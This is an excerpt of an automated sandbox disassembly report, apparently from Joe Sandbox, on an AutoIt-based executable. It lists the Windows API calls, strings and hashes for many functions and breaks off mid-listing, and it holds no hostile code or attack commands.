                                                            • API String ID: 2211948467-2373415609
                                                            • Opcode ID: 1076611c56ad524fc611efdc4c54287bf177679a8fa5e2265c78f23400296ef2
                                                            • Instruction ID: d7cf44fa67297d87183ef710a510ce5de7e561d8aae46429b8965128ca54dc16
                                                            • Opcode Fuzzy Hash: 1076611c56ad524fc611efdc4c54287bf177679a8fa5e2265c78f23400296ef2
                                                            • Instruction Fuzzy Hash: AF024E71900215EFDB14DFA8DC89EAE7BB9FB48310F148258F915AB2E1D778AD01CB64
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,0071F910), ref: 00713627
                                                            • IsWindowVisible.USER32(?), ref: 0071364B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-45149045
                                                            • Opcode ID: 6f8996f6a10b23a146b7a2995820051c5bfa0ceace99ed5c4052b5303e884de7
                                                            • Instruction ID: dd0192255e4dce84e145629d8d4dda1005a462a12ebec36bc61b15d31f22264d
                                                            • Opcode Fuzzy Hash: 6f8996f6a10b23a146b7a2995820051c5bfa0ceace99ed5c4052b5303e884de7
                                                            • Instruction Fuzzy Hash: F9D182702143019BCB44EF18C452AAF7BA6AF54354F14486CF8855B2E3DB39EE8ACB55
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 0071A630
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0071A661
                                                            • GetSysColor.USER32(0000000F), ref: 0071A66D
                                                            • SetBkColor.GDI32(?,000000FF), ref: 0071A687
                                                            • SelectObject.GDI32(?,00000000), ref: 0071A696
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0071A6C1
                                                            • GetSysColor.USER32(00000010), ref: 0071A6C9
                                                            • CreateSolidBrush.GDI32(00000000), ref: 0071A6D0
                                                            • FrameRect.USER32(?,?,00000000), ref: 0071A6DF
                                                            • DeleteObject.GDI32(00000000), ref: 0071A6E6
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0071A731
                                                            • FillRect.USER32(?,?,00000000), ref: 0071A763
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0071A78E
                                                              • Part of subcall function 0071A8CA: GetSysColor.USER32(00000012), ref: 0071A903
                                                              • Part of subcall function 0071A8CA: SetTextColor.GDI32(?,?), ref: 0071A907
                                                              • Part of subcall function 0071A8CA: GetSysColorBrush.USER32(0000000F), ref: 0071A91D
                                                              • Part of subcall function 0071A8CA: GetSysColor.USER32(0000000F), ref: 0071A928
                                                              • Part of subcall function 0071A8CA: GetSysColor.USER32(00000011), ref: 0071A945
                                                              • Part of subcall function 0071A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0071A953
                                                              • Part of subcall function 0071A8CA: SelectObject.GDI32(?,00000000), ref: 0071A964
                                                              • Part of subcall function 0071A8CA: SetBkColor.GDI32(?,00000000), ref: 0071A96D
                                                              • Part of subcall function 0071A8CA: SelectObject.GDI32(?,?), ref: 0071A97A
                                                              • Part of subcall function 0071A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0071A999
                                                              • Part of subcall function 0071A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0071A9B0
                                                              • Part of subcall function 0071A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0071A9C5
                                                              • Part of subcall function 0071A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0071A9ED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 3521893082-0
                                                            • Opcode ID: a3eb296cd5e9263b44cb4229698199dbd16c3ebf3e7d10c84ff66082249dfb20
                                                            • Instruction ID: 9dab24bd0836e98f2d5fecde9d5120685fcdf05419670bee28ecb348bbcf271d
                                                            • Opcode Fuzzy Hash: a3eb296cd5e9263b44cb4229698199dbd16c3ebf3e7d10c84ff66082249dfb20
                                                            • Instruction Fuzzy Hash: 56918D72409305FFC7119F68DC08A9B7BAAFF88321F108B29F966961E1D738D944CB56
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?), ref: 00692CA2
                                                            • DeleteObject.GDI32(00000000), ref: 00692CE8
                                                            • DeleteObject.GDI32(00000000), ref: 00692CF3
                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00692CFE
                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00692D09
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 006CC43B
                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006CC474
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 006CC89D
                                                              • Part of subcall function 00691B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00692036,?,00000000,?,?,?,?,006916CB,00000000,?), ref: 00691B9A
                                                            • SendMessageW.USER32(?,00001053), ref: 006CC8DA
                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006CC8F1
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006CC907
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006CC912
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                            • String ID: 0
                                                            • API String ID: 464785882-4108050209
                                                            • Opcode ID: 252447cc8004588960b8fb1c0a1ea85ddecf531680a9371849cb599709a0c529
                                                            • Instruction ID: fde2eb3ae0e3d89368874269461a24aaec15d9211b6baa04a7e126fa1e1d2732
                                                            • Opcode Fuzzy Hash: 252447cc8004588960b8fb1c0a1ea85ddecf531680a9371849cb599709a0c529
                                                            • Instruction Fuzzy Hash: 9A126A30600202EFDB55CF28C894BB9BBE6FF45320F54856DE499DB662C731E852DB91
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 007074DE
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0070759D
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007075DB
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007075ED
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00707633
                                                            • GetClientRect.USER32(00000000,?), ref: 0070763F
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00707683
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00707692
                                                            • GetStockObject.GDI32(00000011), ref: 007076A2
                                                            • SelectObject.GDI32(00000000,00000000), ref: 007076A6
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007076B6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007076BF
                                                            • DeleteDC.GDI32(00000000), ref: 007076C8
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007076F4
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 0070770B
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00707746
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0070775A
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 0070776B
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0070779B
                                                            • GetStockObject.GDI32(00000011), ref: 007077A6
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007077B1
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007077BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: f408cdfeb68324cb1000d68b01e92535604f236ea0dcfd47d5504bbe059ace37
                                                            • Instruction ID: 9116e69ae292ec7890afd7ac1b9da76384d4fdbc4ef3c779807f8ab9437328fc
                                                            • Opcode Fuzzy Hash: f408cdfeb68324cb1000d68b01e92535604f236ea0dcfd47d5504bbe059ace37
                                                            • Instruction Fuzzy Hash: 7FA145B1A40615BFEB14DB68DC4AFEE77B9EB04711F008118FA15A72E0D774AD40CB64
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 006FAD1E
                                                            • GetDriveTypeW.KERNEL32(?,0071FAC0,?,\\.\,0071F910), ref: 006FADFB
                                                            • SetErrorMode.KERNEL32(00000000,0071FAC0,?,\\.\,0071F910), ref: 006FAF59
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 5c5be02e8b59db9aab75d82aa1738bc77d8eefcab92dddca8ddc24c82add30ef
                                                            • Instruction ID: 9166101e556f8aff82ac6c941987d13d390804c23053a1bc826da2c737651e1d
                                                            • Opcode Fuzzy Hash: 5c5be02e8b59db9aab75d82aa1738bc77d8eefcab92dddca8ddc24c82add30ef
                                                            • Instruction Fuzzy Hash: 575195F064524DDB8B80DF94C942CBD73A7EF09710720805AE60BAB391DB759D42EB63
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: 3fa358c410481cbfd6d039feb20fe3273aee42324676d6c9c9368fddd0afdf33
                                                            • Instruction ID: ec1029fa231dbb1dd86102e1fc7a9f9bbcf320fafc8257ac761d253876110fb2
                                                            • Opcode Fuzzy Hash: 3fa358c410481cbfd6d039feb20fe3273aee42324676d6c9c9368fddd0afdf33
                                                            • Instruction Fuzzy Hash: 4C8115F06003166ADF21AA64DC42FFB376FEF01700F044029F805AA696EB65DE82D399
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00719AD2
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00719B8B
                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 00719BA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: 0
                                                            • API String ID: 2326795674-4108050209
                                                            • Opcode ID: 80992298382075d9ad981db3a9e3e6d8c9ceb726de2b8bfe6d58dd8e98ad83f8
                                                            • Instruction ID: 6b3cac4fdb5c459f7c0916290b3527ed1c9446a34f8b0a3a202c61ddaa0f26b7
                                                            • Opcode Fuzzy Hash: 80992298382075d9ad981db3a9e3e6d8c9ceb726de2b8bfe6d58dd8e98ad83f8
                                                            • Instruction Fuzzy Hash: 7E02EF31104301AFD725CF28C869BEABBE5FF49310F04852DFA95962E1C778D986CB92
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 0071A903
                                                            • SetTextColor.GDI32(?,?), ref: 0071A907
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0071A91D
                                                            • GetSysColor.USER32(0000000F), ref: 0071A928
                                                            • CreateSolidBrush.GDI32(?), ref: 0071A92D
                                                            • GetSysColor.USER32(00000011), ref: 0071A945
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0071A953
                                                            • SelectObject.GDI32(?,00000000), ref: 0071A964
                                                            • SetBkColor.GDI32(?,00000000), ref: 0071A96D
                                                            • SelectObject.GDI32(?,?), ref: 0071A97A
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0071A999
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0071A9B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0071A9C5
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0071A9ED
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0071AA14
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0071AA32
                                                            • DrawFocusRect.USER32(?,?), ref: 0071AA3D
                                                            • GetSysColor.USER32(00000011), ref: 0071AA4B
                                                            • SetTextColor.GDI32(?,00000000), ref: 0071AA53
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0071AA67
                                                            • SelectObject.GDI32(?,0071A5FA), ref: 0071AA7E
                                                            • DeleteObject.GDI32(?), ref: 0071AA89
                                                            • SelectObject.GDI32(?,?), ref: 0071AA8F
                                                            • DeleteObject.GDI32(?), ref: 0071AA94
                                                            • SetTextColor.GDI32(?,?), ref: 0071AA9A
                                                            • SetBkColor.GDI32(?,?), ref: 0071AAA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: f040b5bc60fb9ed4c03fa818facfa6b6a615a67525f02ce4f42e4a2252b4e823
                                                            • Instruction ID: 3fb8116835fb71c4c4e6b8e045cb83379a4005e38a073cd11bfa2f373686c67d
                                                            • Opcode Fuzzy Hash: f040b5bc60fb9ed4c03fa818facfa6b6a615a67525f02ce4f42e4a2252b4e823
                                                            • Instruction Fuzzy Hash: 78512C71901208FFDB119FA8DC48EEE7B79EF08320F118625F915AB2E1D7799980DB94
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00718AC1
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00718AD2
                                                            • CharNextW.USER32(0000014E), ref: 00718B01
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00718B42
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00718B58
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00718B69
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00718B86
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00718BD8
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00718BEE
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00718C1F
                                                            • _memset.LIBCMT ref: 00718C44
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00718C8D
                                                            • _memset.LIBCMT ref: 00718CEC
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00718D16
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00718D6E
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00718E1B
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00718E3D
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00718E87
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00718EB4
                                                            • DrawMenuBar.USER32(?), ref: 00718EC3
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00718EEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0
                                                            • API String ID: 1073566785-4108050209
                                                            • Opcode ID: ff77b454b6cc0ec3be799a89481ab8e278d61373331000b7d92f60d1bc09f8d7
                                                            • Instruction ID: 4cc69d8079ad8bc2ccefb1b10ce2635b04ce62468fff5a1fc7569ee3e054343a
                                                            • Opcode Fuzzy Hash: ff77b454b6cc0ec3be799a89481ab8e278d61373331000b7d92f60d1bc09f8d7
                                                            • Instruction Fuzzy Hash: F2E17070900208ABDB60DF68CC85EEE7BB9EF09710F10815AF915AA2D0DB7899C5DF65
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 007149CA
                                                            • GetDesktopWindow.USER32 ref: 007149DF
                                                            • GetWindowRect.USER32(00000000), ref: 007149E6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00714A48
                                                            • DestroyWindow.USER32(?), ref: 00714A74
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00714A9D
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00714ABB
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00714AE1
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00714AF6
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00714B09
                                                            • IsWindowVisible.USER32(?), ref: 00714B29
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00714B44
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00714B58
                                                            • GetWindowRect.USER32(?,?), ref: 00714B70
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00714B96
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00714BB0
                                                            • CopyRect.USER32(?,?), ref: 00714BC7
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00714C32
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: 41c791456c6a64aa29c102104089a2e1f5aca3a3bbf432a8b4f18896f963ac8a
                                                            • Instruction ID: 7424fee2e845e15b1f7ae5b8582b4f358c7baf45758c8ccf4f304eeda182a52d
                                                            • Opcode Fuzzy Hash: 41c791456c6a64aa29c102104089a2e1f5aca3a3bbf432a8b4f18896f963ac8a
                                                            • Instruction Fuzzy Hash: 89B19C70608340AFDB44DF68C849BAABBE5FF84710F00891CF5999B2A1D779EC45CB99
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 006F44AC
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006F44D2
                                                            • _wcscpy.LIBCMT ref: 006F4500
                                                            • _wcscmp.LIBCMT ref: 006F450B
                                                            • _wcscat.LIBCMT ref: 006F4521
                                                            • _wcsstr.LIBCMT ref: 006F452C
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 006F4548
                                                            • _wcscat.LIBCMT ref: 006F4591
                                                            • _wcscat.LIBCMT ref: 006F4598
                                                            • _wcsncpy.LIBCMT ref: 006F45C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 699586101-1459072770
                                                            • Opcode ID: 60c374d2fdb581ae083e2c952b28272a2572b8d82dd863ec730d0f3275efbd3a
                                                            • Instruction ID: 292a5ab3aaac61a31188a2fce57c78ce801fc5ccd941895f7eb3c32d36215ee1
                                                            • Opcode Fuzzy Hash: 60c374d2fdb581ae083e2c952b28272a2572b8d82dd863ec730d0f3275efbd3a
                                                            • Instruction Fuzzy Hash: E641D4B16002057BEB50BB748C46EFF77ADDF42710F004169FA04E62C2EE289A4197AA
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006928BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 006928C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006928EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 006928F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 0069291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00692939
